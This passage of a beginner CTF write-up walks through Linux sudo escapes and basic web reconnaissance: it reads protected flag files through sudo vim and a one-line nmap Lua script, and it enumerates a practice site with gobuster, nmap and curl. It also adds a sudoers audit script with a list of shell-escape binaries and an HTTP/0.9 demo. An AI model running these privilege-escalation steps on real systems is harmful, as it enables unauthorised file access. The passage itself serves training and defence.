-rw-------  1 vimuser vimuser  12K Oct 30 07:27 .swp
-r--------  1 vimuser root      36 Oct 23 16:36 flag.txt

:view /home/vimuser/flag.txt
${HF_FLAG_16}

The flag was in the /home/vimuser/flag.txt file: ${HF_FLAG_16}

Nmap (7 pts)

Challenge description:

On the box, you are allowed to use nmap as another user. What can you do with these new privileges? Are you able to read the secret files from the user’s home directory?

Note: use the SSH key from the first Linux challenge to log into the box.

How to solve:

$ ls -hla /home/nmapuser
total 24K
drwxr-xr-x  2 nmapuser nmapuser 4.0K Oct 23 16:38 .
drwxr-xr-x 10 root     root     4.0K Nov 11  2021 ..
-rw-r--r--  1 nmapuser nmapuser  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 nmapuser nmapuser 3.7K Apr  4  2018 .bashrc
-rw-r--r--  1 nmapuser nmapuser  807 Apr  4  2018 .profile
-r--------  1 nmapuser root       36 Oct 23 16:38 flag.txt

$ echo 'local f=io.open("/home/nmapuser/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > /tmp/read_file
$ sudo -u nmapuser nmap --script /tmp/read_file
Starting Nmap 7.60 ( https://nmap.org ) at 2022-10-30 15:25 UTC
NSE: Warning: Loading '/tmp/read_file' -- the recommended file extension is '.nse'.
${HF_FLAG_17}

The flag was in the /home/nmapuser/flag.txt file: ${HF_FLAG_17}
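
Seen from the defender's side, the Sudo, VIM and Nmap challenges are one and the same finding: a sudoers entry that looks narrow (a single binary, or a single script) but hands over the full power of the target user, because the binary can run shell commands, read any file, or load a user-supplied script. The block below is an added example (not the post's code) that parses sudo -l output and classifies each entry for an audit. The sample input is the sudo -l output from the Sudo challenge; the list of shell-escape-capable binaries and the risk levels are this example's own choices, not an exhaustive catalogue.

```python
"""Audit `sudo -l` output for entries that grant more than they appear to.
Added example, not the post's code. SAMPLE_SUDO_L is the sudo -l output quoted in
the write-up; the classification rules below are this example's own."""
import re
from posixpath import basename

SAMPLE_SUDO_L = r"""Matching Defaults entries for cerealkiller on ip-172-31-16-57:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cerealkiller may run the following commands on ip-172-31-16-57:
    (phantom) NOPASSWD: ALL
    (vimuser) NOPASSWD: /usr/bin/vim
    (nmapuser) NOPASSWD: /usr/bin/nmap
    (pathuser) NOPASSWD: /home/pathuser/pathuser.sh
"""

# Binaries that can run arbitrary commands or read arbitrary files once run through sudo
# (editors, pagers, interpreters, and tools that load user-supplied scripts such as nmap --script).
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk", "nmap",
                         "python", "python3", "perl", "ruby", "bash", "sh", "env", "tar", "zip"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")

# "(runas) TAG: TAG: command[, command...]" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Return one dict per allowed command: runas user, NOPASSWD flag, command."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        match = ENTRY_RE.match(line)
        if not match:
            continue
        runas, tags, commands = match.groups()
        runas_user = runas.split(":")[0].strip()  # "(user : group)" -> user
        tag_set = {t.strip() for t in tags.split(":") if t.strip()}
        for cmd in (c.strip() for c in commands.split(",") if c.strip()):
            entries.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tag_set, "command": cmd})
    return entries


def classify(entry):
    """Return (risk, reason) for a single parsed entry."""
    cmd = entry["command"]
    if cmd == "ALL":
        return "high", f"any command as {entry['runas']}"
    exe = cmd.split()[0]
    if basename(exe) in SHELL_ESCAPE_BINARIES:
        return "high", f"{basename(exe)} can execute arbitrary commands or read arbitrary files as {entry['runas']}"
    if not exe.startswith(SYSTEM_DIRS):
        return "medium", "command outside system directories: verify that neither the script nor its parent directories are writable by the invoking user"
    return "low", "specific system binary; review its arguments"


def audit(text):
    findings = []
    for entry in parse_sudo_l(text):
        risk, reason = classify(entry)
        findings.append({**entry, "risk": risk, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        auth = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{f['risk']:6}] ({f['runas']}) {f['command']} [{auth}]: {f['reason']}")
```

The fix on the defending side is the usual one: grant sudo on tools that cannot spawn anything (or wrap the one action that is needed in a root-owned script with fixed arguments), and treat every editor, pager or script-loading tool in sudoers as equivalent to granting a shell as the target user.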

Web Track

The web track had a few interesting challenges.

Crawler (3 pts)

Challenge description:

What page does a crawler check to see where it can and cannot go? It is used to instruct bots like Google which pages they can or cannot show on their search engine; it is however a good source of information to find hidden pages without bruteforcing. Use the server http://beginner-web.hfctf.ca. The answer is a full flag, not just the file name.

How to solve:

$ curl http://beginner-web.hfctf.ca/robots.txt
${HF_FLAG_18}

The flag was in the response: ${HF_FLAG_18}

Find an alternate index. (6 pts)

Challenge description:

Are you able to find a hidden website under http://beginner-web.hfctf.ca/?

It is important to check the other files under a website that you want to pentest.

Recommended tools: nikto, dirb

How to solve:

  1. Using the wordlists from the Kali container image (in /usr/share/dirb/wordlists/), let’s run gobuster on the web site.
    $ gobuster dir -u http://beginner-web.hfctf.ca/ -w common.txt
    ===============================================================
    Gobuster v3.2.0-dev
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://beginner-web.hfctf.ca/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.2.0-dev
    [+] Timeout:                 10s
    ===============================================================
    2022/10/30 11:39:19 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta                 (Status: 403) [Size: 286]
    /.htaccess            (Status: 403) [Size: 286]
    /.git/HEAD            (Status: 200) [Size: 21]
    /.htpasswd            (Status: 403) [Size: 286]
    /admin                (Status: 301) [Size: 330] [--> http://beginner-web.hfctf.ca/admin/]
    /assets               (Status: 301) [Size: 331] [--> http://beginner-web.hfctf.ca/assets/]
    /index.htm            (Status: 200) [Size: 36]
    /index.html           (Status: 200) [Size: 93]
    /LICENSE              (Status: 200) [Size: 6555]
    /pages                (Status: 301) [Size: 330] [--> http://beginner-web.hfctf.ca/pages/]
    /robots.txt           (Status: 200) [Size: 36]
    /server-status        (Status: 403) [Size: 286]
    Progress: 4603 / 4615 (99.74%)
    ===============================================================
    2022/10/30 11:39:35 Finished
    ===============================================================
    
  2. Make a request on the index.htm page:
    $ curl http://beginner-web.hfctf.ca/index.htm
    ${HF_FLAG_19}
    

The flag was in the response: ${HF_FLAG_19}

Port Scan (3 pts)

Challenge description:

By default, nmap will only scan the top 1000 ports. Can you learn how to fix this? If you find a weird port, you can poke it with nc (netcat).

The wanted port is within the 13XXX.

Address: beginner-web.hfctf.ca

Recommended Tools: nmap, nc (netcat)

How to solve:

  1. Start by scanning the port range to find the mysterious port:
    $ nmap -p 13000-13999 beginner-web.hfctf.ca
    Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-30 11:46 EDT
    Nmap scan report for beginner-web.hfctf.ca (18.234.148.248)
    Host is up (0.031s latency).
    rDNS record for 18.234.148.248: ec2-18-234-148-248.compute-1.amazonaws.com
    Not shown: 999 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    13337/tcp open  unknown
    
    Nmap done: 1 IP address (1 host up) scanned in 4.60 seconds
    
  2. Attempt to query the page with our favourite HTTP client:
    $ curl http://beginner-web.hfctf.ca:13337
    curl: (1) Received HTTP/0.9 when not allowed
    
  3. This is interesting - let’s try again but this time using HTTP 0.9:
    $ curl --http0.9 http://beginner-web.hfctf.ca:13337/
    ${HF_FLAG_20}
    

The flag was in the response: ${HF_FLAG_20}
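
The curl error is worth understanding rather than just working around: an HTTP/0.9 server answers with the raw body only, no status line and no headers, so a client that expects "HTTP/1.x 200 ..." has nothing to parse and modern curl refuses the response unless --http0.9 is given. The block below is an added example (not the post's code) that reproduces the behaviour on the loopback interface with a constructed one-shot server, then classifies the response the way a client has to: whatever does not start with a status line is HTTP/0.9, and the whole stream is the body. The port number and the placeholder body are constructed; the real service lived on the 13xxx port found above.

```python
"""Tell an HTTP/0.9 response apart from HTTP/1.x and recover its body.
Added example, not the post's code. The one-shot server is a constructed stand-in
for the challenge service; nothing here talks to the real host."""
import socket
import threading


def serve_once(body, http09, host="127.0.0.1"):
    """Start a one-shot TCP server on an ephemeral loopback port and return the port.
    With http09=True it answers like the challenge service: body only, then close."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)  # read (and ignore) the request line and headers
            if http09:
                conn.sendall(body)
            else:
                head = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n" % len(body)
                conn.sendall(head + body)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return port


def fetch_raw(host, port, path="/", timeout=3.0):
    """Send a plain GET and return everything the server sends back until it closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def classify_response(raw):
    """Return (version, body). A response without a status line is HTTP/0.9: it is all body."""
    if raw.startswith(b"HTTP/"):
        head, sep, body = raw.partition(b"\r\n\r\n")
        if not sep:
            head, sep, body = raw.partition(b"\n\n")
        version = head.split(b" ", 1)[0].decode("ascii", "replace")
        return version, body
    return "HTTP/0.9", raw


def probe(host, port):
    return classify_response(fetch_raw(host, port))


if __name__ == "__main__":
    port = serve_once(b"FLAG-PLACEHOLDER\n", http09=True)
    print(probe("127.0.0.1", port))
    port = serve_once(b"FLAG-PLACEHOLDER\n", http09=False)
    print(probe("127.0.0.1", port))
```

Because an HTTP/0.9 response has no headers, there is no Content-Length either: the only end-of-body signal is the server closing the connection, which is why fetch_raw reads until recv returns an empty byte string.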

List Of Challenges

This is the list of all challenges in this Beginner CTF:

├── Beginner - AWS (dax)
│   ├── 01 - AWS whoami (5)
│   ├── 02 - AWS cat mysecrets.txt (6)
│   ├── 03 - AWS ls and cp (7)
│   ├── 04 - AWS mongodump (8)
│   ├── 05 - AWS sudo (9)
│   ├── 06 - AWS curl (10)
│   ├── 07 - AWS python3 my_script.py (6)
│   ├── 08 - AWS docker pull (8)
│   ├── 09 - AWS cat /var/log/* (7)
│   └── 10 - AWS login (10)
├── Beginner - Cipher (dax)
│   ├── 1 - Write your own decryption algorithm.  (8)
│   └── 2 - Homemade bruteforce (10)
├── Beginner - Cipher (Viper)
│   ├── Base64 (2)
│   └── Julius (3)
├── Beginner - Hash (Viper)
│   ├── LM (5)
│   ├── MD5 (5)
│   ├── NTLM (5)
│   └── SHA1 (6)
├── Beginner - Linux (Viper)
│   ├── Hidden File (3)
│   ├── Nmap (7)
│   ├── SSH Key (2)
│   ├── Sudo (4)
│   └── VIM (5)
├── Beginner - Reverse Engineering (dax)
│   ├── 1 - Bypassing the Password is One Way to do it. (7)
│   ├── 2 - The Real Password is Actually a Flag.  (8)
│   └── A totally legit spreadsheet.  (8)
├── Beginner - SQL (dax)
│   ├── 1 - The Most Basic Form of Injection.  (3)
│   ├── 2 - Get the root user.  (4)
│   ├── 3 - There is Another User...  (5)
│   └── 4 - What About a Random ID?  (6)
├── Beginner - Steganography (dax)
│   ├── 1 - Encrypted (5)
│   ├── 2 - An Image is Worth a Thousand Words.  (5)
│   └── 3 - Things Aren't Always What They Seem.  (5)
├── Beginner - Trivia (Viper)
│   ├── Movie (2)
│   ├── Personality (2)
│   └── Ports (2)
├── Beginner - Web (Viper)
│   ├── Crawler (3)
│   ├── Find an alternate index. (6)
│   └── Port Scan (3)
├── Beginner - Windows (Viper and h3xit)
│   ├── 01 - New Employees ( Start Here ) (2)
│   ├── Domain Admin (25)
│   ├── Domo Arigato.. (5)
│   ├── IIS Application Pool Password (15)
│   ├── Private Share (10)
│   ├── Public User Share (10)
│   ├── Some fields are not meant for secrets! (8)
│   ├── Welcome Password (5)
│   └── Workstation Admin (15)
├── Beginner - Windows (Viper)
│   ├── GPP (5)
│   ├── Hashdump10 (5)
│   ├── Hashdump7 (3)
│   └── Mimikatz (5)
└── Beginner - World of Phenix (@PhenixCorp)
    ├── 1 - Lazy Tiger 🐯 (10)
    ├── 2 - Concatenation Encoding ⚠️ (15)
    ├── 4 - Vigenère what ? ☣️ (35)
    └── 5 - Simple Phenix Ransomware 🔪 (45)